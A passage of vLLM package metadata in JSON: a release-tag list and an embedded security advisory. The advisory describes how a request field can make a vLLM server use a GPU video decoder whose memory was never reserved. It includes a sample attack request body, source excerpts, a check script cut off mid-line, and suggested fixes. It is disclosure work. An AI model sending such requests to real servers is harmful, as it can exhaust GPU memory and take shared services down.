null,"purl":"pkg:github/vllm-project/vllm@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"79d406e9183aa12cdef6f1876eb9a15385662587","kind":"commit","published_at":"2024-07-05T19:44:40.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.1/manifests"},{"name":"v0.5.0.post1","sha":"50eed24d252965a81ce50b64fd387d60fb1f4f6e","kind":"commit","published_at":"2024-06-13T23:06:49.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.0.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.0.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.5.0.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.0.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.0.post1/manifests"},{"name":"v0.5.0","sha":"8f89d72090da70895d77d32248ea8504f7daba50","kind":"commit","published_at":"2024-06-11T18:12:13.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.5.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.5.0/manifests"},{"name":"v0.4.3","sha":"1197e02141df1a7442f21ff6922c98ec0bba153e","kind":"commit","published_at":"2024-06-01T00:21:38.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.4.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"c7f2cf2b7f67bce5842fedfdba508440fe257375","kind":"commit","published_at":"2024-05-05T04:28:58.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.4.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"468d761b32e3b3c5d64eeaa797e54ab809b7e50c","kind":"commit","published_at":"2024-04-24T01:54:33.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.4.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.1/manifests"},{"name":"v0.4.0.post1","sha":"a3c226e7eb19b976a937e745f3867eb05f809278","kind":"commit","published_at":"2024-04-02T19:57:04.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.4.0.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.4.0.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.4.0.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.0.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.0.post1/manifests"},{"name":"v0.4.0","sha":"51c31bc10ca7c48b580cd58fcd741ba4d6db4447","kind":"commit","published_at":"2024-03-30T01:53:08.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.4.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.4.0/manifests"},{"name":"v0.3.3","sha":"82091b864af105dbe373353655dc9d8c0a6ba66f","kind":"commit","published_at":"2024-03-01T20:58:06.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.3.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"8fbd84bf7839d53e6dd26a1dd4473dd1a99aab6e","kind":"commit","published_at":"2024-02-21T19:47:25.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.3.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"5f08050d8d0bfcdaced0fe706cdfc9e311e0f263","kind":"commit","published_at":"2024-02-16T23:05:18.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.3.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"1af090b57d0e23d268e79941f8084bf0a8ad8621","kind":"commit","published_at":"2024-01-31T08:07:07.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.3.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.3.0/manifests"},{"name":"v0.2.7","sha":"2e0b6e775756345aa1d39f772c186e00f8c29e92","kind":"commit","published_at":"2024-01-04T01:35:56.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.7","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"671af2b1c0b3ed6d856d37c21a561cc429a10701","kind":"commit","published_at":"2023-12-17T18:34:56.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.6","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"31c1f3255ee9771538da138396e1a50e369f8723","kind":"commit","published_at":"2023-12-14T07:56:15.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"4dd4b5c538dabcf2c822bc91b4f760364520e5af","kind":"commit","published_at":"2023-12-11T19:49:39.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"0f90effc660317070b88b860eda76bfb3b596701","kind":"commit","published_at":"2023-12-03T20:27:47.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"c5f7740d89737744438e08c26da1d4fbadcb3893","kind":"commit","published_at":"2023-11-19T05:57:07.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.2/manifests"},{"name":"v0.2.1.post1","sha":"3d40c834f020a0d180a0af49bf25ffa9b22fa84b","kind":"commit","published_at":"2023-10-17T16:30:46.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.1.post1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.1.post1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.1.post1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.1.post1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.1.post1/manifests"},{"name":"v0.2.1","sha":"651c614aa43e497a2e2aab473493ba295201ab20","kind":"commit","published_at":"2023-10-16T19:58:57.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"e2fb71ec9f2c3168ba8614408fa807a5f65707c5","kind":"commit","published_at":"2023-09-28T22:30:38.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.2.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.2.0/manifests"},{"name":"v0.1.7","sha":"90eb3f43ca5228647c834243d98881d53c7745d0","kind":"commit","published_at":"2023-09-11T07:54:30.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.7","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"1117aa1411d9858ea5eef8a81e044379432e6d0e","kind":"commit","published_at":"2023-09-08T07:07:46.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.6","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"852ef5b4f5481ce526c804ea234d1de0df91f48d","kind":"commit","published_at":"2023-09-07T23:15:31.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.5","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"791d79de3261402fae1b9d0b1650655071a68095","kind":"commit","published_at":"2023-08-25T03:28:00.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.4","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"aa84c92ef636e689b506b9842c712e5c615cc73a","kind":"commit","published_at":"2023-08-02T23:46:53.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.3","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"1c395b4eaa805fc7cacf2f591e658ce395761537","kind":"commit","published_at":"2023-07-05T04:41:53.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.2","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"83658c8ace771617460f9e2d5f1cf6f811d6d6fb","kind":"commit","published_at":"2023-06-22T07:33:32.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.1","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"67d96c29fba9b72cb4c4edbc26211c208a00ebdd","kind":"commit","published_at":"2023-06-20T06:19:47.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/v0.1.0","html_url":"https://github.com/vllm-project/vllm/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/v0.1.0/manifests"},{"name":"submission","sha":"aa50b17ca776f8c69a793787d0ce06dfa4671884","kind":"commit","published_at":"2023-04-17T04:49:14.000Z","download_url":"https://codeload.github.com/vllm-project/vllm/tar.gz/submission","html_url":"https://github.com/vllm-project/vllm/releases/tag/submission","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/vllm-project/vllm@submission","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/submission","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/tags/submission/manifests"}]},"repo_metadata_updated_at":"2026-09-30T15:33:31.930Z","dependent_packages_count":46,"downloads":1942109,"downloads_period":"last-month","dependent_repos_count":5,"rankings":{"downloads":1.4887329000895686,"dependent_repos_count":6.77552759932442,"dependent_packages_count":7.373338280337238,"stargazers_count":0.3267084127416281,"forks_count":1.5593618926991717,"docker_downloads_count":3.1683074536919187,"average":3.448662756480658},"purl":"pkg:pypi/vllm","advisories":[{"uuid":"GSA_kwCzR0hTQS04cHcyLTZqdjMtbWo1as4AB5OW","url":"https://github.com/advisories/GHSA-8pw2-6jv3-mj5j","title":"vLLM: Request-selected PyNvVideoCodec GPU decode bypasses static VRAM reservation","description":"## Summary\n\nCurrent vLLM `main` lets an inference request choose the PyNvVideoCodec GPU video decoder through `media_io_kwargs.video.video_backend`, but engine GPU memory reservation is computed only from static startup configuration and `VLLM_VIDEO_LOADER_BACKEND`. If the server starts with the default OpenCV/software backend and no `--mm-ipc-gpu-memory-gb` budget, a client can still route a video request into the PyNvVideoCodec path after startup, causing frontend CUDA-context, decoder-surface, and decoded-frame GPU allocations that were not carved out of the engine KV-cache budget.\n\n## Technical Details\n\nThe vulnerable boundary is the split between request-time media decoding choices in the API server and startup-time memory budgeting in the engine worker. Request bodies for Chat Completions and Responses expose `media_io_kwargs`, and those values are forwarded to the shared media connector. For video inputs, `MediaConnector.fetch_video()` copies `self.media_io_kwargs[\"video\"]` into `video_io_kwargs`, only setting a model-derived backend when `video_backend` is absent. `VideoMediaIO.__init__()` then consumes `video_backend` from those kwargs and loads that backend from `VIDEO_LOADER_REGISTRY`.\n\nThe relevant request-side source path is:\n\n```python\nvideo_io_kwargs = dict(self.media_io_kwargs.get(\"video\", {}))\nif \"video_backend\" not in video_io_kwargs and (\n    video_backend := get_video_loader_backend_for_processor(video_processor)\n):\n    video_io_kwargs[\"video_backend\"] = video_backend\nvideo_io = VideoMediaIO(image_io, **video_io_kwargs)\n```\n\n```python\nvideo_loader_backend = (\n    kwargs.pop(\"video_backend\", None) or envs.VLLM_VIDEO_LOADER_BACKEND\n)\nself.video_loader = VIDEO_LOADER_REGISTRY.load(video_loader_backend)\n```\n\n`VideoBackend.load_bytes()` then dispatches `backend == \"pynvvideocodec\"` into `decode_frames_pynvvideocodec()`, which constructs a PyNvVideoCodec decoder, creates or uses a CUDA stream, reads stream metadata, decodes selected frames on the GPU, and copies those frames into pinned host memory. The new frontend GPU memory pool accounts only for raw decoded frame bytes when a pool exists; it does not make request-time backend selection safe when no startup reservation was made.\n\nThe engine-side reservation code makes its decision from static model config and environment only:\n\n```python\ndef _uses_pynvvideocodec_video_backend(mm_config) -\u003e bool:\n    video_kwargs = mm_config.media_io_kwargs.get(\"video\", {})\n    video_loader_backend = (\n        video_kwargs.get(\"video_backend\") or envs.VLLM_VIDEO_LOADER_BACKEND\n    )\n    codec_backend = video_kwargs.get(\"backend\")\n    return (\n        video_loader_backend == PYNVVIDEOCODEC_VIDEO_BACKEND\n        or codec_backend == PYNVVIDEOCODEC_VIDEO_BACKEND\n    )\n```\n\n```python\ndecoder_reserved_bytes = (\n    num_api_servers * per_server_decoder_bytes\n    if self._uses_pynvvideocodec_video_backend(mm_config)\n    else 0\n)\nreserved_bytes = raw_frame_reserved_bytes + decoder_reserved_bytes\nif reserved_bytes \u003c= 0:\n    return available_kv_cache_memory_bytes\n```\n\nWith default static video configuration, `mm_config.media_io_kwargs[\"video\"]` does not name PyNvVideoCodec and `VLLM_VIDEO_LOADER_BACKEND` defaults to OpenCV/software decoding. The worker therefore reserves no PyNv decoder/CUDA-context bytes. A later request can still set `media_io_kwargs.video.video_backend=\"pynvvideocodec\"` and reach the GPU decoder path because that runtime field is intentionally honored by `VideoMediaIO`.\n\n## PoV\n\nAn ordinary multimodal inference request can carry the backend override in the request body:\n\n```json\n{\n  \"model\": \"served-vlm\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": [\n        {\"type\": \"text\", \"text\": \"summarize this clip\"},\n        {\"type\": \"video_url\", \"video_url\": {\"url\": \"data:video/mp4;base64,\u003csmall-mp4\u003e\"}}\n      ]\n    }\n  ],\n  \"media_io_kwargs\": {\n    \"video\": {\n      \"video_backend\": \"pynvvideocodec\"\n    }\n  }\n}\n```\n\nThe following bounded source-level check confirms the code path without allocating GPU memory:\n\n```bash\ngit clone --filter=blob:none https://github.com/vllm-project/vllm.git\ncd vllm\ngit checkout ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a\npython3 check_pynv_backend_reservation.py --repo .\n```\n\n## PoC\n\nThe bounded check validates current source markers, simulates the exact static reservation predicate, and compares vulnerable and negative-control configurations. Key output:\n\n```json\n{\n  \"vulnerable\": true,\n  \"head\": \"ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a\",\n  \"reservation_simulation\": {\n    \"env_video_loader_backend\": \"opencv\",\n    \"request_selects_pynv_after_startup\": true,\n    \"vulnerable_static_reserved_bytes\": 0,\n    \"negative_control_static_pynv_reserved_bytes\": 2066953011,\n    \"raw_frame_only_control_reserved_bytes\": 268435456,\n    \"unreserved_decoder_bytes_when_only_request_selects_pynv\": 2066953011\n  }\n}\n```\n\nThe negative control is important: when PyNvVideoCodec is selected statically, the worker reserves `2066953011` bytes per API process for decoder surfaces plus CUDA context. The vulnerable case reserves `0` bytes for the same decoder overhead because PyNvVideoCodec is selected only by the later request. A second control with static OpenCV plus `mm_ipc_gpu_memory_gb=0.25` reserves only the raw-frame semaphore budget and still does not reserve PyNv decoder/CUDA-context bytes.\n\n## Impact\n\nAn attacker who can submit video requests to a vLLM deployment with PyNvVideoCodec available can force frontend GPU decoding even when the engine did not reserve memory for that decoder during startup. On high-utilization serving deployments, the unreserved CUDA context, retained decoder surfaces, and decoded-frame allocations can reduce or exhaust GPU memory that the engine assumed was available for weights, activations, or KV cache, causing request failures, worker crashes, or service-level denial of service.\n\nSuggested severity is Medium with conservative CVSS v3.1 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (6.5). If a deployment exposes the affected API without authentication, `PR:N` would raise the deployment-specific score. Suggested weaknesses are `CWE-770` (Allocation of Resources Without Limits or Throttling) and `CWE-400` (Uncontrolled Resource Consumption). This should not be rated Low because the affected resource is shared GPU memory in the serving path and the code already treats the PyNv decoder/CUDA-context footprint as large enough to reserve at startup when statically configured.\n\nLimitations: exploitation requires a GPU deployment where PyNvVideoCodec is installed and usable, and the request must reach a video-capable model/path. The issue does not claim code execution, data disclosure, or SSRF.\n\n## Suggested Fix\n\nDo not allow untrusted request fields to select a GPU decoder that was not included in startup memory reservation. The simplest fix is to reject request-level `media_io_kwargs.video.video_backend=\"pynvvideocodec\"` unless the static server configuration already selected PyNvVideoCodec and reserved its decoder/CUDA-context budget.\n\nIf dynamic backend selection remains supported, split software and GPU decoder policies: allow request selection among CPU/software decoders only, require an explicit operator allowlist for GPU decoders, and include every request-selectable GPU decoder in the startup reservation predicate. Add regression coverage for static OpenCV startup config plus request-level PyNvVideoCodec override, and preserve the negative control where static PyNvVideoCodec configuration reserves decoder/CUDA-context bytes.\n\n## Affected Package/Versions\n\nPackage: `vllm` from `vllm-project/vllm`.\n\nConfirmed affected: current `main` at `ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a`.\n\nIntroduced by: `af16446bf39de047ab57649c933063cf1cbf1e50`, `Vram semaphore infra (#44465)`, committed 2026-06-26T17:32:51-07:00.\n\nRelease status checked: `git tag --contains af16446bf` returned no release tags in the fresh checkout. GitHub repository metadata reported latest published release `v0.23.0` published 2026-06-15T05:27:20Z; the local `v0.24.0` tag also does not contain the introducing commit. The affected range should therefore be current `main` builds containing `af16446bf` until fixed, rather than a confirmed released-version range.\n\n## Advisory History\n\nPublic vLLM advisories checked included audio decompression-bomb DoS, unbounded `video/jpeg` frame-count DoS, MediaConnector SSRF, video processing RCE, multimodal embedding DoS/RCE, GGUF GPU memory exposure, multimodal hashing, and other request-parameter DoS classes. None matched request-selected PyNvVideoCodec or the static VRAM reservation mismatch.\n\nPrior local/private vLLM report families checked included request-level `media_io_kwargs` reopening `video/jpeg` frame fanout, GLM video metadata amplification, and audio media decode duration-limit bypass. Those reports share the request-level media kwargs boundary, but they target CPU/media decode limits or model metadata amplification. This report targets a different privileged asset and fix surface: GPU decoder selection after engine startup memory reservation.\n\nFocused GitHub issue/PR searches for `pynvvideocodec`, `mm_ipc_gpu_memory`, `video_backend media_io_kwargs`, `Vram semaphore infra`, and `frontend multimodal GPU decoding` found the PyNvVideoCodec zero-copy RFC, an old do-not-review prototype, merged PR `#44465`, and an unrelated TorchCodec backend PR. No public issue or PR described this security boundary.\n\n## Appendix: Bounded Source-Level Check\n\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport argparse\nimport json\nimport re\nimport subprocess\nfrom pathlib import Path\n\nMIB = 1024 * 1024\nGIB = 1024 * MIB\n\ndef read(repo: Path, rel: str) -\u003e str:\n    return (repo / rel).read_text(encoding=\"utf-8\")\n\ndef const_int(source: str, name: str) -\u003e int:\n    expr = re.search(rf\"^{name}\\s*=\\s*(.+)$\", source, flags=re.MULTILINE).group(1).strip()\n    if expr == \"128 * MiB_bytes\":\n        return 128 * MIB\n    if expr == \"int(1.8 * 1024 * MiB_bytes)\":\n        return int(1.8 * 1024 * MIB)\n    if expr == \"1\":\n        return 1\n    raise AssertionError(expr)\n\ndef uses_pynv_static(static_media_io_kwargs: dict[str, dict[str, str]], env_backend: str) -\u003e bool:\n    video_kwargs = static_media_io_kwargs.get(\"video\", {})\n    video_loader_backend = video_kwargs.get(\"video_backend\") or env_backend\n    codec_backend = video_kwargs.get(\"backend\")\n    return video_loader_backend == \"pynvvideocodec\" or codec_backend == \"pynvvideocodec\"\n\ndef reserve_bytes(static_media_io_kwargs, env_backend, mm_ipc_gpu_memory_gb, decoder_bytes, cuda_context_bytes, retained_decoders):\n    raw_frame_reserved_bytes = int(mm_ipc_gpu_memory_gb * GIB)\n    per_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes\n    decoder_reserved_bytes = per_server_decoder_bytes if 